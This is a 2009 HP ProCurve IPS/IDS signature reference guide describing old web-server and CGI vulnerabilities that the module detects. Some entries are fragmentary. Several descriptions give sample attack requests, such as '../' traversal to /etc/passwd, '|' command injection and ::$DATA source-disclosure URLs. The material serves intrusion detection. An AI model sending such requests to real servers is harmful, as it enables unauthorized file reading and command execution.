Signature ID - Hewlett Packard Enterprise Support Center

Transcription

ProCurve
Switches
ProCurve 5400zl
Threat Management
Services zl Module
Installation and Getting Started Guide
IPS/IDS Signature Reference Guide
Version RLX.10.2.2.94
© Copyright 2009 Hewlett-Packard Development Company, LP. The
information contained herein is subject to change without notice.
Publication Date
May 2009
HEWLETT-PACKARD COMPANY MAKES NO WARRANTY OF ANY KIND
WITH REGARD TO THIS MATERIAL, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE. Hewlett-Packard shall not be liable for errors
contained herein or for incidental or consequential damages in connection
with the furnishing, performance, or use of this material.
The only warranties for HP products and services are set forth in the express
warranty statements accompanying such products and services. Nothing
herein should be construed as constituting an additional warranty. HP shall
not be liable for technical or editorial errors or omissions contained herein.
Applicable Products
HP ProCurve Threat Management Services
zl Module
HP ProCurve Threat Management Services
zl Module with 1-year IPS subscription
service bundle
Disclaimer
(J9155A)
Hewlett-Packard assumes no responsibility for the use or reliability of its
software on equipment that is not furnished by Hewlett-Packard.
(J9156A)
Warranty
See the Customer Support/Warranty booklet included with the product.
Trademark Credits
Microsoft®, Windows®, and Windows NT® are US registered trademarks
of Microsoft Corporation.
Adobe® and Acrobat® are trademarks of Adobe Systems Incorporated.
Java™ is a US trademark of Sun Microsystems, Inc.
Hewlett-Packard Company
8000 Foothills Boulevard, m/s 5551
Roseville, California 95747-5551
www.procurve.com
A copy of the specific warranty terms applicable to your Hewlett-Packard
products and replacement parts can be obtained from your HP Sales and
Service Office or authorized dealer.
ProCurve TMS zl Module IPS/IDS Signature
Reference Guide Version RLX.10.2.2.94
Signature ID: 1
BEA WebLogic URL JSP Request Source Code Disclosure Vulnerability
Threat Level: Warning
Bugtraq: 2527 Nessus: 10715,10949
Signature Description: BEA Systems WebLogic Server is an enterprise level web and wireless application server.
Apache Tomcat is a Servlet container developed by the Apache Software Foundation (ASF). BEA Systems Weblogic
Server 5.1, Apache Software Foundation Tomcat 4.0, and Apache Software Foundation Tomcat 3.2.1 can be tricked
into revealing the source code of JSP scripts by using simple URL encoding of characters in the file name extension.
e.g: default.js%70 (=default.jsp) won't be considered as a script but rather as a simple document.
Signature ID: 2
ColdFusion exprcalc.cfm File Disclosure Vulnerability
Industry ID: CVE-1999-0477 CVE-1999-0455 Bugtraq: 115 Nessus: 10001
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. Allaire ColdFusion Server 2.0, 3.0
and 4.0 contain a flaw that may lead to an unauthorized information disclosure. It is possible to read arbitrary files on
the remote server using the CGI: /cfdocs/expeval/exprcalc.cfm. This CGI allows anyone to view, delete and upload
anything on the remote ColdFusion Application server.
Signature ID: 4
IIS4 ExAir Sample Site DoS Vulnerability
Industry ID: CVE-1999-0449 Bugtraq: 193 Nessus: 10002
Signature Description: Microsoft IIS (Internet Information Services, formerly called Internet Information Server) is a
set of Internet-based services for servers using Microsoft Windows. Microsoft IIS 4.0 comes with the sample site called
'ExAir'. Unfortunately, one of its pages, namely 'advsearch.asp', may be used to make IIS hang, thus preventing it from
answering to legitimate clients. This happens if the required DLLs are not running in the system.
Signature ID: 5
Industry ID: CVE-1999-0449 CVE-1999-0449 Bugtraq: 193 Nessus: 10003,10002
'ExAir'. Unfortunately, one of its pages, namely 'query.asp', may be used to make IIS hang, thus preventing it from
Signature ID: 6
'ExAir'. Unfortunately, one of its pages, namely 'search.asp', may be used to make IIS hang, thus preventing it from
3
Signature ID: 7
Alibaba get32.exe Arbitrary Command Execution Vulnerability
Threat Level: Severe
Signature Description: A computer program that is responsible for accepting HTTP requests from web clients and
serving them HTTP responses along with optional data contents, which usually are web pages such as HTML
documents and linked objects (images, etc.) is known as a web server. Alibaba Web Server 2.0 contains a flaw that may
allow a remote attacker to execute arbitrary commands. The vulnerability lies in the program 'get32.exe'. This program
does not sanitize user-supplied input. By appending additional commands via a '|' character, arbitrary commands can be
executed under the privileges of the web server.
Signature ID: 8
Alibaba.pl CGI Command Execution Vulnerability
allow a remote attacker to execute arbitrary commands. The vulnerability lies in the Alibaba.pl cgi. This script does not
sanitize arguments supplied to it. With a specially crafted request, an attacker can provide additional commands that
will be executed.
Signature ID: 9
Alibaba tst.bat CGI Command Execution Vulnerability
Industry ID: CVE-1999-0885 Bugtraq: 770 Nessus: 10014,10011
allow a remote attacker to execute arbitrary commands. The vulnerability lies in the tst.bat CGI. The script does not
sanitize arguments supplied to it. With a specially crafted request, an attacker can provide additional commands that
will be executed.
Signature ID: 10
Altavista Intranet Search Directory Traversal Vulnerability
Signature Description: A search engine is an information retrieval system designed to help find information stored on a
computer or a network of computers. An intranet is a private computer network that uses Internet protocols and
network connectivity to securely share part of an organization's information or operations with its employees. AltaVista
Intranet Search versions 2.3 A and 2.0b CGI contain a flaw that allows a remote attacker to read arbitrary files outside
of the web path. The issue is due to the "query" not properly sanitizing user input, specifically traversal style attacks
(../../) supplied via the "mss" variable. Due to this vulnerability, it is possible to read the content of any files of the
remote host by making the request : GET /cgi-bin/query?mss=%2e%2e/some_file.
4
Signature ID: 13
Httpd input2.bat arbitrary command execution Vulnerability
documents and linked objects (images, etc.) is known as a web server. AN-HTTPd server is one such server. If one of
these CGIs is installed on the AN-HTTPd 1.2 b server: cgi-bin/test.bat cgi-bin/input.bat cgi-bin/input2.bat
ssi/envout.bat, it is possible to misuse them to make the remote server execute arbitrary commands. This signature
detects attacks using input2 and test batch files.
Signature ID: 14
Httpd envout.bat cgi vulnerability
documents and linked objects (images, etc.) is known as a web server. AN-HTTPd server is one such server. If one of
these CGIs is installed on the AN-HTTPd 1.2 b server: cgi-bin/test.bat cgi-bin/input.bat cgi-bin/input2.bat
ssi/envout.bat, it is possible to misuse them to make the remote server execute arbitrary commands. This signature
detects attacks that use envout.bat.
Signature ID: 15
Anacondaclip cgi directory traversal vulnerability
Signature Description: Anaconda! Partners is a Massachusetts based company formed in 1999 to bring engaging
content easily and quickly to websites around the world. Clipper is a headline-gathering tool from Anaconda! Partners
that allows Web site operators to integrate headlines from a variety of news sources into their web site. Ananconda
Partners Clipper 3.3 and earlier could allow a remote attacker to traverse directories on the web server. A remote
attacker can send a URL request containing "dot dot" sequences (/../) to traverse directories and view arbitrary files on
the web server.
Signature ID: 16
Apache DIR listing cgi vulnerability
Signature Description: The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP
server for modern operating systems including UNIX and Windows. Apache HTTP Server has been the most popular
HTTP server on the World Wide Web. By making requests ending with '?M=A' or '?S=D' to the Apache web server
1.3.20, with Multiviews enabled, it is sometimes possible to obtain a directory listing even if an index.html file is
present.
Signature ID: 17
Apache ASP 1.95 source.asp cgi vulnerability
Signature Description: The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP
server for modern operating systems including UNIX and Windows. Apache HTTP Server is the most popular HTTP
5
server on the World Wide Web. Apache::ASP module provides support for Active Server Pages on the Apache Web
Server with Perl scripting, and enables developing of dynamic web applications with session management and
embedded Perl code. Apache::ASP module 1.93 and earlier come with source.asp file that allows anyone to write to
files in the '/site/eg/' directory An attacker may use this flaw to upload his own scripts and execute arbitrary commands
on this host.
Signature ID: 18
Microsoft IIS ASP Alternate Data Streams Source Disclosure Vulnerability
Signature Description: Microsoft Internet Information Server (IIS) is a web server for Windows platform. IIS versions
4.0 and prior are vulnerable to a source code disclosure vulnerability. NTFS supports multiple data streams within a
file. The main data stream, which stores the primary content, has an attribute called $DATA. Accessing this NTFS
stream through IIS from a browser such as http://xyz/myasp.asp::$DATA may display the contents of a file
(myasp.asp) that is normally set to be acted upon by an Application Mapping. Files which are granted read access and
are on NTFS file system can be viewed by the remote user.
Signature ID: 19
ASP Source Code Disclosure DOT Cgi Vulnerability
set of Internet-based services for servers using Microsoft Windows. In IIS versions 2.0 and 3.0, it is possible to get the
source code of the remote ASP scripts by appending '%2e' instead of a '.' (dot) at the end of the request (ex: GET
/default%2easp). ASP source codes usually contain sensitive information such as logins and passwords.
Signature ID: 20
HIS Software Auktion 1.62 Directory Traversal Vulnerability
Signature Description: HIS Auktion is a CGI script for hosting and managing online auctions. A remote user could
gain read access to known files outside of the root directory where HIS Software Auktion 1.62 resides. Requesting a
specially crafted URL composed of '../' sequences along with the known filename will disclose the requested file. This
vulnerability could also lead to the execution of arbitrary code.
Signature ID: 21
AXIS StorPoint Vulnerability
Signature Description: AXIS StorPoint CD+ is CD/DVD server for efficiently storing and sharing CD/DVD media
across networks. It is possible to access the remote host AxisStorpoint configuration by requesting:
http://server/cd/../config/html/cnf_gi.htm. Gaining such information can be starting point of a more serious attack, as
the attacker has some idea about system configuration.
Signature ID: 22
Basilix WebMail Incorrect File Permissions Vulnerability
Signature Description: BasiliX is a webmail application based on PHP and IMAP, and powered with the MySQL
6
database server. Basilix Webmail System version 0.9.7beta is vulnerable to Information Disclosure. If the Web server
is not configured to recognize files with .class or .inc extensions as PHP scripts at the httpd.conf file, a remote attacker
can send an HTTP request to view these files, which may contain sensitive data, such as the MySQL password and
username information. As a workaround, define the .class and .inc file extensions as PHP files, and then deny read
permissions from untrusted users.
Signature ID: 23
Sun's Java Web Serve Bboard Servlet vulnerability
Threat Level: Critical
Signature Description: Sun Java Web Server is a web server designed for medium and large business applications.In un
Java Web Server 2.0 and Sun Java Web Server 1.1.3, the example 'bboard' servlet has a well known security flaw that
lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Therefore access to
this program from outside is suspicious.
Signature ID: 24
Bigconf cgi File View vulnerability
Signature Description: BigIP is a load balancing system from F5 software. It has a web-based configuration system,
which is vulnerable to several standard CGI attacks. The 'bigconf' cgi has a well known security flaw that lets anyone to
view arbitrary files on the system which it is installed on. F5 BigIP 2.0 is vulnerable.
Signature ID: 25
Bizdb1 search cgi vulnerability
Signature Description: BizDB is a web database integration product using perl CGI scripts. One of the scripts, bizdbsearch.cgi, passes a variable's contents to an unchecked open() call and can therefore be made to execute commands at
the privilege level of the webserver. The variable is dbname, and if passed a semicolon followed by shell commands
they will be executed. This cannot be exploited from a browser, as the software checks for a referrer field in the HTTP
request. A valid referrer field can however be created and sent programmatically or via a network utility like netcat.
CNC Technology BizDB 1.0 is vulnerable.
Signature ID: 26
Access to Vulnerable Cachemgr CGI
Signature Description: Squid is a caching proxy for the Web, supporting HTTP, HTTPS, FTP, and more. The
'cachemgr.cgi' module is a management interface for the Squid proxy service. It is installed by default in a public web
directory ('/cgi-bin'), by multiple versions of Red Hat Linux (from 5.2 to FEDORA CORE 3), if the Squid package is
selected during installation. Other flavours of linux including Debian Linux 3.0 also provide the same script if Squid
package is selected during installation. This script prompts for a host and port, which it then tries to connect to. If a
webserver such as Apache is running, this can be used to connect to arbitrary hosts and ports, allowing for potential use
as an intermediary in denial-of-service attacks, proxied port scans, etc. Interpreting the output of the script can allow
the attacker to determine whether or not a connection was established. Therefore, access to this script from outside may
be suspicious and administrator is advised to check the system's log.
7
Signature ID: 27
Calendar admin cgi vulnerability attempt
Signature Description: Matt Kruse's Calendar script is a popular, free perl cgi-script used by many websites on the
Internet. It allows a website administrator to easily setup and customize a calendar on their website. There are two
components of this package, calendar-admin.pl and calendar.pl. In Matt Kruse Calendar Script 2.2 , Calendar-admin.pl
calls open() with user-input in the command string without parsing the input for metacharacters. It is therefor possible
to execute arbitrary commands on the target host by passing "|shell command|" as one value of the "configuration file"
field. The shell that is spawned with the open() call will then execute those commands with the uid of the webserver.
This can result in remote access to the system for the attacker. Calendar.pl is vulnerable to a similar attack.
Signature ID: 30
ColdFusion Debug cgi vulnerability
Nessus: 10797
development of computer software in general, and dynamic web sites in particular. In versions 4.5 and 5.0 (and
probably in older versions), it is possible to see the ColdFusion Debug Information by appending ?Mode=debug at the
end of the request (like GET /index.cfm?Mode=debug). The Debug Information usually contain sensitive data such as
Template Path or Server Version which may provide information for use in subsequent attacks.
Signature ID: 32
Cgicso command execution cgi vulnerability
Signature Description: CGIEmail is a form processing script, written in the C language. It allows account holders to set
up feedback forms with the input from users being directed to the configured e-mail recipient. It takes the contents of a
form specified in a html file and emails them to a specified location. A mail specification in a text file is used to format
and mail the resulting email message. Buffer overflow in cgicso.c for cgiemail 1.6 allows remote attackers to cause a
denial of service (crash) and possibly execute arbitrary code via a long query parameter.
Signature ID: 33
Cgiforum cgi vulnerability vulnerability
Signature Description: CGIForum is a commercial cgi script from Markus Triska which is designed to facilitate webbased threaded discussion forums. In Markus Triska CGIForum 1.0, the 'cgiforum.pl' has a well known security flaw.
The script improperly validates user-supplied input to the "thesection" parameter. If an attacker supplies a carefullyformed URL contaning '/../' sequences as argument to this parameter, the script will traverse the normal directory
structure of the application in order to find the specified file. As a result, it is possible to remotely view arbitrary files
on the host which are readable by user 'nobody'.
Signature ID: 35
Cobalt RaQ Cgiwrap cgi vulnerability
Industry ID: CVE-1999-1530 CVE-2000-0431 Bugtraq: 777,1238 Nessus: 10041
Signature Description: The Cobalt RaQ is a 1U rackmount server product line developed by Cobalt Networks, Inc.
8
(later purchased by Sun Microsystems) featuring a modified Red Hat Linux operating system and a proprietary GUI for
server management. Cobalt RaQ 2 and RaQ 3 servers come with a program called "cgiwrap", which acts as a wrapper
for cgi programs, so that they run with the uid of their user instead of 'nobody'. cgiwrap as used on Cobalt RaQ 2.0 and
RaQ 3i does not properly identify the user for running certain scripts. This allows a malicious site administrator to view
or modify data located at another virtual site on the same system. Also, if the files are uploaded from Frontpage, the
files are owned by 'httpd' user. This allows override of user privilages due to configuration settings of Apache
server. 
Signature ID: 36
Allaire ColdFusion Server (4.5.1) Administrator Login Password DoS Vulnerability
development of computer software in general, and dynamic web sites in particular. A denial of service vulnerability
exists within the Allaire ColdFusion web application server (version 4.5.1 and earlier) which allows an attacker to
overwhelm the web server and deny legitimate web page requests. By downloading and altering the login HTML form
an attacker can send overly large passwords (>40,0000 chars) to the server, causing it to stop responding.
Signature ID: 37
Commerce cgi access vulnerability
Bugtraq: 2361,2001-0210 Nessus: 10612
Signature Description: Commerce.CGI is a Free ecommerce shopping cart program with a web based store manager
application for managing online stores. The Carey Internet Services Commerce.cgi version 2.0.1 has a well known
security flaw that lets an attacker read arbitrary files with the privileges of the http daemon (usually root or nobody).
Adding the string "/../%00" in front of a web page document will allow an remote attacker to be able to view any files
on the server, provided that the HTTPd has the correct permissions. The example is:
http://www.example.com/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
Signature ID: 38
Access to Vulnerable CGI Count.cgi
Signature Description: The wwwCount 'Count.cgi' program is used to record and display the number of times a WWW
page has been accessed. Due to insufficient bounds checking on arguments which are supplied by users in wwwCount
2.3, it is possible to overwrite the internal stack space of the Count.cgi program while it is executing. By supplying a
carefully designed argument to the Count.cgi program (QUERY_STRING environment variable), intruders may be
able to force Count.cgi to execute arbitrary commands with the privileges of the httpd process.
Signature ID: 40
Access to vulnerable version cvsweb.cgi
Signature Description: CVSweb is a web interface for a CVS repository. It allows users to browse through the source
code history of projects. The cvsweb CGI script in CVSWeb 1.80 allows remote attackers with write access to a CVS
repository to execute arbitrary commands via shell metacharacters. CVSWeb Developer CVSWeb 1.80 is vulnerable.
9
Signature ID: 42
Access to Vulnerable Dbman CGI
Industry ID: CVE-2000-0381 Bugtraq: 1178
Signature Description: DBMan is a full-featured Database Manager that provides a web interface to add, remove,
modify or view records in a flatfile ascii database. It is possible to cause the DBMan 2.0.4 CGI to reveal sensitive
information, by requesting an invalid database file from a web server such as: GET
/scripts/dbman/db.cgi?db=nonexistant-db. An attacker can thus gain access to critical information that may be used in
further attacks.
Signature ID: 43
Dcforum cgi vulnerability
Industry ID: CVE-2001-0436 CVE-2001-0437 CVE-2001-0527 Bugtraq: 2611,2728 Nessus: 10583
Signature Description: DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based
threaded discussion forums. The 'dcforum' CGI in versions 1.0 to 6.0 and 2000v1.0 has a well known security flaw that
lets an attacker execute arbitrary commands with the privileges of the http daemon (usually root or nobody). DCForum
fails to properly validate user-supplied input to the script. By inserting shell commands in submitted querystrings, an
attacker can cause the script to open and parse commands in an external file on the target system. By supplying a long
path (containing '/../' sequences) an attacker can force the script to open a file from arbitrary locations on the filesystem.
Most of the 'DC Scripts DCForum' are vulnerable.
Signature ID: 44
Directorypro CGI Traversal Vulnerability
Signature Description: Webdirectory Pro is a web application used to create a searchable directory of links developed
by Cosmicperl. The CGI 'directorypro.cgi' in Cosmicperl Directory Pro 2.0 has a well known security flaw that lets an
attacker read arbitrary files with the privileges of the http daemon (usually root or nobody). The value of the 'show'
variable is not properly validated and can be used to force 'directorypro.cgi' to output the contents of an arbitrary
webserver-readable file to a remote attacker. This is due to a lack of checks for NULL bytes in user-supplied data.
Signature ID: 45
Access to /doc Directory vulnerability
Signature Description: A default configuration of Apache on Debian Linux sets the ServerRoot to /usr/doc, which
allows remote users to read documentation files for the entire server. Therefore /doc directory is browsable. /doc shows
the content of the /usr/doc and /doc/package directories and therefore it reveals information about programs and more
important, the version of the installed programs. Debian Linux 2.1 is vulnerable.
Signature ID: 61
Access to Domino db related .nsf files detected
Nessus: 10629
Signature Description: The remote Lotus Domino server allows an anonymous user to access sensitive information
such as users, databases, configuration of servers. Lotus Domino server is vulnerable to information disclosure. A
10
successful exploitation of this vulnerability allows an attacker to access sensitive information on the vulnerable system.
This signature specifically detects "nsf" pattern in the traffic sent to the http server.
Signature ID: 62
Access to Domino db sensitive files detected
Nessus: 10629
Signature Description: The remote Lotus Domino server allows an anonymous user to access sensitive information
such as users, databases, configuration of servers. Lotus Domino server is vulnerable to information disclosure. A
successful exploitation of this vulnerability allows an attacker to access sensitive information on the vulnerable system.
This signature specifically detects "mail.box" pattern in the traffic sent to the http server.
Signature ID: 64
Dumpenv cgi vulnerability
Signature Description: Sambar server is a multi-threaded, extensible application server with highly programmable API.
It has virtual domain support with independent document/CGI directories, log files, and error templates.'dumpenv.pl' is
a utility that will display environment information on which the server resides.In Sambar Server 4.1, this utility
displays sensitive information. This information could include the server software version being used, directory settings
and path information. This information may help a hacker in subsequent attacks.
Signature ID: 65
Empower path cgi vulnerability
Signature Description: Brightstation Muscat is a search engine application. It is possible to get the physical location of
a virtual web directory of a host in Brightstation Muscat 1.0 by issuing an invalid request in the DB parameter(for
example: GET /cgi-bin/empower?DB=whatever HTTP/1.0). Remote attackers can thus gain access to sensitive
information, which may assist in further attacks against the host.
Signature ID: 67
Eshop cgi arbitrary commane execution vulnerability
Signature Description: Webdiscount E-Shop Online Shop System is a web commerce application. It is written and
maintained by Michael Boehme. A problem exists in a default implementation of the Michael Boehme WebDiscount
E-Shop Online-Shop System 1.0 that may allow a user to potentially pass malicious input to the script. This is due
insufficient sanitization from untrusted sources. For example, an attacker can use shell metacharacters (';', '|', etc.),
which will allow arbitrary commands to be executed by the host with the privileges of the webserver process.
Successful exploitation of this issue may cause sensitive information to be disclosed to the attacker.
Signature ID: 69
Excite for Web Servers 1.1 Command Execution Vulnerability
Signature Description: Excite for Web Servers is a search engine suite for web servers running under Windows NT and
UNIX. Excite Excite for Web Servers 1.1 has a well known security flaw that lets anyone execute arbitrary commands
11
with the privileges of the http daemon (root or nobody). It allows remote command execution via shell metacharacters
due to insufficient input validation in architext_query.pl script.
Signature ID: 70
Faxsurvey cgi vulnerability
Signature Description: Hylafax is a popular fax server software package designed to run on multiple UNIX operating
systems. Unpatched version of Hylafax 4.0 pl2 ships with an insecure script, faxsurvey, which allows remote command
execution with the privileges of the web server process. This can be exploited simply by passing the command as a
parameter to the script. Consequences could include web site defacement, exploiting locally accessible vulnerabilities
to gain further privileges, etc.
Signature ID: 71
FormHandler cgi vulnerability
Signature Description: Matt Wright FormHandler.cgi is a form handling script that helps in validation and management
of user submitted data. Any file that the Matt Wright FormHandler.cgi 2.0 has read access to (the cgi is typically run as
user 'nobody' on Unix systems) can be specified as an attachment in a reply email. This could allow an attacker to gain
access to sensitive files such as /etc/passwd simply by modifying the form document.
Signature ID: 75
FrontPage 97/98 Htimage.exe buffer overflow vulnerability
Signature Description: Two components of FrontPage 97 and 98 Server Extensions, Htimage.exe and Imagemap.exe,
contain unchecked buffers. If carefully-chosen arguments were supplied to these components, they could be made to
run code via a classic buffer overrun vulnerability. The buffer overflow occurs when remote htimage.exe cgi is
given the request : /cgi-bin/htimage.exe/]long string]?0,0
Signature ID: 76
Access to Microsoft Frontpage Extensions vulnerability
Industry ID: CVE-1999-0386 CVE-2000-0114 CVE-2000-0260 Bugtraq: 1108,989,1109 Nessus: 10077,10369
Signature Description: FrontPage extensions provide the user with the ability to remotely create and manipulate web
site files on the server. Frontpage Extensions extensions in Microsoft InterDev 1.0 and Microsoft FrontPage 98 Server
Extensions for IIS allows a remote attacker to read files on the server by using a nonstandard URL. To be specific, Two
dlls (dvwssr.dll and mtd2lv.dll) include an obfuscation string that manipulates the name of requested files. Knowing
this string and the obfuscation algorithm allows anyone with web authoring privileges on the target host to download
any .asp or .asa source on the system (including files outside the web root, through usage of the '../' string). This
includes users with web authoring rights to only one of several virtual hosts on a system, allowing one company to
potentially gain access to the source of another company's website if hosted on the same physical machine.
Signature ID: 77
Access to Microsoft Frontpage _vti_pvt directory vulnerability
Industry ID: CVE-1999-0386 CVE-2000-0260 Bugtraq: 1108,989,1109 Nessus: 10078,10369
12
site files on the server. Frontpage Extensions extensions in Microsoft InterDev 1.0 and Microsoft FrontPage 98 Server
Extensions for IIS allows a remote attacker to read files on the server by using a nonstandard URL. To be specific, Two
dlls (dvwssr.dll and mtd2lv.dll) include an obfuscation string that manipulates the name of requested files. Knowing
this string and the obfuscation algorithm allows anyone with web authoring privileges on the target host to download
any .asp or .asa source on the system (including files outside the web root, through usage of the '../' string). This
includes users with web authoring rights to only one of several virtual hosts on a system, allowing one company to
potentially gain access to the source of another company's website if hosted on the same physical machine. Remote
attackers can view the contents of the authors.pwd configuration file by sending a HyperText Transfer Protocol (HTTP)
request. The attacker can then crack the passwords stored in this file, and use the passwords to gain unauthorized access
to the affected server.
Signature ID: 78
Access to Microsoft Frontpage dvwssr.dll vulnerability
Industry ID: CVE-2000-0260 Bugtraq: 1108,1109 Nessus: 10369
site files on the server. Microsoft InterDev 1.0, Microsoft FrontPage 98 Server Extensions for IIS ship with a dvwssr.dll
file that is vulnerable to a buffer overflow that allows anyone to execute arbitrary commands on the server or cause a
Denial of service in case of unsuccessful attack attempts. This file is found in /_vti_bin/_vti_aut/ path.
Signature ID: 79
Shtml.exe reveals full path vulnerability
Industry ID: CVE-2000-0413 CVE-2002-0072 Bugtraq: 1174,4479 Nessus: 10405,10937
site files on the server. The shtml.exe program in the FrontPage extensions package of IIS 4.0, 5.0, Frontpage Server
Extensions 1.1 and prior ship with a vulnerable shtml.exe or shtml.dll (depending on platform) that discloses the full
path to the remote web root when it is given a non-existent file as an argument.For example, performing a request for
http://target/_vti_bin/shtml.dll/non_existant_file.html will produce an error message stating "Cannot open
"C:\localpath\non_existant_file.html": no such file or folder". Such information can help an attacker in subsequent
attacks.
Signature ID: 80
Access to vulnerable aglimpse cgi
Signature Description: Vulnerabilities exist in the GlimpseHTTP and WebGlimpse packages. Both of these packages
provide a web interface which allows users to use Glimpse, an indexing and query system, to provide a search facility
for your web site. The cgi-bin programs in these packages perform insufficient argument checking. Due to this,
intruders may be able to execute arbitrary commands with the privileges of the httpd process. GlimpseHTTP 2.0 is
known to be vulnerable in this fashion. The authors of GlimpseHTTP and WebGlimpse also believe earlier versions of
both GlimpseHTTP (prior to 2.0) and WebGlimpse (prior to 1.5) may be vulnerable to similar attacks. There are reports
of attacks using the aglimpse cgi-bin program (part of GlimpseHTTP).
Signature ID: 82
Access to vulnerable guestbook.pl (.cgi) script
Industry ID: CVE-1999-0237 CVE-2002-0730 CVE-1999-1053 Bugtraq: 776,4566 Nessus: 10099,10098
Signature Description: A guestbook script allows visitors to sign and leave greetings on the website. Two different
guestbook CGIs - Matt Wright GuestBook 2.3 and Philip Chinery's Guestbook 1.1 are exploitable on Apache server.
13
Matt Wright GuestBook 2.3 allows for remote command execution, including displaying of any files to which the web
server has read access. Philip Chinery's Guestbook 1.1 does not filter script code from form fields. As a result, it is
possible for an attacker to inject script code into pages that are generated by the guestbook. Additionally, script code is
not filitered from URL parameters, making the guestbook prone to cross-site scripting attacks.
Signature ID: 83
Access to vulnerable cgi script 'Handler'
Signature Description: IRIX is a computer operating system developed by Silicon Graphics, Inc. to run natively on
their 32- and 64-bit MIPS architecture workstations and servers. A vulnerability exists in the cgi-bin program 'handler',
as included by Silicon Graphics in their Irix operating system. This vulnerability will allow a remote attacker to execute
arbitrary commands on the vulnerable host as the user the web server is running as. This can easily result in a user
being able to access the system. SGI IRIX 6.4, SGI IRIX 6.3, SGI IRIX 6.2, SGI IRIX 5.3 are vulnerable.
Signature ID: 84
Home Free search.cgi directory traversal vulnerability
Signature Description: Home Free is a suite of Perl cgi scripts that allow a website to support user contributions of
various types. In Solution Scripts Home Free 1.0 one of the scripts, search.cgi, accepts a parameter called 'letter' which
can be any text string. The supplied argument can contain the '../' string, which the script will process. This can be used
to obtain directory listings and the first line of files outside of the intended web filesystem. It is possible to read
arbitrary files on the remote server by requesting : GET /cgi-bin/search.cgi?letter=\\..\\..\\.....\\file_to_read An attacker
may use this flaw to read arbitrary files on this server.
Signature ID: 86
Access to vulnerable cgi 'htdig'
Signature Description: The ht://Dig system is a complete world wide web indexing and searching system for a domain
or intranet developed at San Diego State University. The 'htsearch' CGI, which is part of the htdig package (ht://Dig),
suffers from many flaws. It allows a malicious user to view any file on the target computer by enclosing the file name
with backticks (`) in parameters to htsearch (CVE-2000-0208). htsearch program in htdig 3.1.5 and earlier allows
remote attackers to use the -c option to specify an alternate configuration file, which could be used to (1) cause a denial
of service (CPU consumption) by specifying a large file such as /dev/zero, or (2) read arbitrary files by uploading an
alternate configuration file that specifies the target file (CVE-2001-0834). It also allows remote attackers to determine
the physical path of the server by requesting a non-existent configuration file using the config parameter, which
generates an error message that includes the full path (CVE-2000-1191).
Signature ID: 87
Access to vulnerable cgi 'htgrep'
Industry ID: CVE-2000-0832 Nessus: 10495
Signature Description: Htgrep allows you to query any document accessible to your server on a paragraph-byparagraph basis. It can search plain text, HTML and Refer bibliography files. It is a set of cgi-bin scripts written in perl.
Htgrep CGI program allows remote attackers to read arbitrary files by specifying the full pathname in the 'hdr'
parameter. e.g. http://www.example.com/cgi-bin/htgrep/file=index.html&hdr=/etc/passwd.
14
Signature ID: 88
Htmlscript cgi access vulnerability
Signature Description: Miva's htmlscript CGI program provides a unique scripting language with HTML type tags.
Versions of the htmlscript interpreter (a CGI script) prior to 2.9932 are vulnerable to a file reading directory traversal
attack using relative paths (eg., "../../../../../../etc/passwd"). An attacker need only append this path as a variable passed
to the script via a URL. The contents of any file to which the web server process has read access can be retrieved using
this method.
Signature ID: 91
File reading attempt by prefixing file name with "~nobody" vulnerability
Nessus: 10484
Signature Description: It is possible to access arbitrary files on the remote web server by appending ~nobody/ in front
of their name (as in ~nobody/etc/passwd). This problem is due to a misconfiguration in HTTP server that sets UserDir
to './'. Apache server and lighttpd server < 1.4.19 are known to be vulnerable.
Signature ID: 92
Microsoft IIS 5.0 Translate Header Source Disclosure Vulnerability
set of Internet-based services for servers using Microsoft Windows. Microsoft Internet Information Server (IIS) 5.0 is
vulnerable to Source Code disclosure when a HTTP request comes with a Translate header field and a back slash '\'
appended to the end of the URL. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as
ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and
then executes them on the server. When a request is made as above, the scripting engine will be able to locate the
requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file
source to the client. Apply the appropriate patch for your system, as listed in Microsoft Security Bulletin MS00-058.
Signature ID: 93
ICat Carbo Server File Disclosure Vulnerability
Signature Description: ICat Electronic Commerce Suite is an application which enables a user to create and manage
web based catalogues. carbo.dll in iCat Electronic Commerce Suite 3.0 allows remote attackers to read arbitrary files
via directory traversal using relative path. It is possible to access any object on the system.Successful exploitation of
this vulnerability may disclose sensitive information such as usernames and passwords and aid in the development of
further attacks.
Signature ID: 94
Access to IIS 5 Internet Printing Protocol ISAPI extension (.printer) vulnerability
Signature Description: Windows 2000 has native support for the Internet Printing Protocol (IPP), an industry-standard
protocol for submitting and controlling print jobs over HTTP. The protocol is implemented in Windows 2000 via an
ISAPI extension that is installed by default as part of Windows 2000 but which can only be accessed via IIS 5.0. At
least one security problem (a buffer overflow) has been found with that extension in the past. The attacker could exploit
15
the vulnerability, which results because the ISAPI extension contains an unchecked buffer in a section of code that
handles input parameters. This could enable a remote attacker to conduct a buffer overrun attack and cause code of her
choice to run on the server.
Signature ID: 96
Microsoft IIS IDQ/IDA File Request vulnerability
Industry ID: CVE-2000-0071 CVE-2000-0098 CVE-2001-0500 CVE-2000-0098 Bugtraq: 1065,2880 Nessus: 10492
Signature Description: This signature detects an attempt to access .idq or .ida or .htx files via HTTP request. Microsoft
Internet Information Service (IIS) 4.0 installs several Internet Service Application Programming Interface (ISAPI)
extensions. The .idq ISAPI filter provides support for Internet Data Queries and are used to implement custom
searches. The .ida ISAPI filter provides support for Internet Data Administration and are used used to manage the
indexing server. Both extensions make use of Microsoft Indexing server but these extensions will be installed by
default with IIS 4.0. When a remote user requests a non-existant .ida or .idq file the real pathname of the document root
is revealed by the Indexing server error messages that are generated for the request. This information is useful for the
attacker to attack further.
Signature ID: 99
/iisadmpwd/aexp2.htr access vulnerability
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. Version 4.0 of IIS
installs a remotely accessible directory, /IISADMPWD - mapped to c:\winnt\system32\inetsrv\iisadmpwd, which
contains a number of vulnerable '.HTR' files. There are two known vulnerabilities. (1) These files were designed to
